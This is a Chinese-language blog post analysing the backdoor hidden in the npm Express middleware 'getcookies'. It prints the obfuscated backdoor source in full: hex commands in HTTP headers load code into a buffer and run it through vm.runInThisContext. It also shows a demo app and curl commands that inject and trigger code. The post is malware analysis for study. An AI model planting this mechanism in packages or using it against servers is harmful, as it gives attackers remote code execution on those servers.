Express 中介軟體 getcookies 後門程式碼分析

前段時間 Express 中的一箇中介軟體 getcookies 被爆出存在 backdoor，關注了一波，但僅看官方npm 的解釋，一時半會兒沒想明白黑客是怎麼留的後門，一直困擾著我。今天有空仔細看了一下，瞭解了黑客具體的作案手段。文中的程式碼可以在 drafts/getcookies 中查詢。

原文連結

後門程式碼分析

這個後門程式碼找得也不容易，因為在被爆出後門後，npm 團隊第一時間就刪除下架了，github 上的倉庫也沒找到，不過不負有心人，在 npm.runkit 中找到了後門原始碼。

• 黑客巧妙地把 backdoor 程式碼偽裝成測試程式碼放在 test 目錄中，並在 index.js “不經意” 引入了測試程式碼
• 主要的 require('vm')['runInThisContext'] 程式碼被編碼故意偽裝了一下
• 全程使用 16 進位制，讓不想細看的人以為是測試程式碼

// 分配一塊 64K 的記憶體
module.exports.log = module.exports.log || Buffer.alloc(0xffff);

// gCOMMANDhDATAi
JSON.stringify(req.headers).replace(/g([a-f0-9]{4})h((?:[a-f0-9]{2})+)i/gi, (o, p, v) => {
    // 以 0xfffe 命令為樣例
    // 將字串 feff 讀入 Buffer
    // 'feff' => <Buffer fe ff>
    // readUInt16LE 讀取 16 bit(位) 並以 byte(位元組) 反向排序
    // <Buffer fe ff> => 0xfffe
    //
    // > Buffer.from('feff', 'hex').readUInt16LE(0) === 0xfffe
    // true
    // > Buffer.from('1234567890', 'hex').readUInt32LE(1).toString(16)
    // '90785634'
    p = Buffer.from(p, 'hex').readUInt16LE(0);
    switch (p) {

        case 0xfffe:
            module.exports.log = Buffer.alloc(0xffff);
            return;
        case 0xfffa:
            return setTimeout(() => {

                // 去除末尾的 0x00
                let c = module.exports.log.toString().replace(/\x00*$/, '');
                module.exports.log = Buffer.alloc(0xffff);

                // 不能以 0x00 開頭
                if (c.indexOf('\x00') < 0) {
                    // require('vm')['runInThisContext'](c)(module.exports, require, req, res, next)
                    // 程式碼必須是個函式
                    require('\x76\x6d')['\x72\x75\x6e\x49\x6e\x54\x68\x69\x73\x43\x6f\x6e\x74\x65\x78\x74'](c)(module.exports, require, req, res, next);
                }
                next();
            }, 1000);
        default:
            // 我們以 (function(){console.log('hack')}) 為例
            v = Buffer.from(v, 'hex');
            for (let i = 0; i < v.length; i++) {

                // 因為執行命令的時候，不能以 0x00 開頭
                // 所以，p 必須是 0x0000
                module.exports.log[p + i] = v[i];
            }
    }
});
複製程式碼

測試一下後門

寫一個 express 應用，並將中介軟體引入進來

var express = require('express')
var app = express()

var getcookies = require('..');

app.use(getcookies);
app.get('/', function (req, res) {
  res.send('Hello World')
})

app.listen(3000)

複製程式碼

啟動並執行我們的後門程式碼

$ node demo/index.js
// 向伺服器注入 16 進位制程式碼 (function(){console.log('hack')})
$ curl -H 'evil: g0000h2866756e6374696f6e28297b636f6e736f6c652e6c6f6728276861636b27297d29i'  http://127.0.0.1:3000
// 向伺服器傳送執行命令
$ curl -H 'evil: gfaffh00i'  http://127.0.0.1:3000
複製程式碼

注意，中途出現的 hack 就是被注入程式碼的輸出。

References

• 以上分析的倉庫程式碼

• 檔案來源

• 討論地址

• 細思極恐：後門程式碼被隱藏在npm模組中，差點就得逞

• npm blog

• 16進位制轉換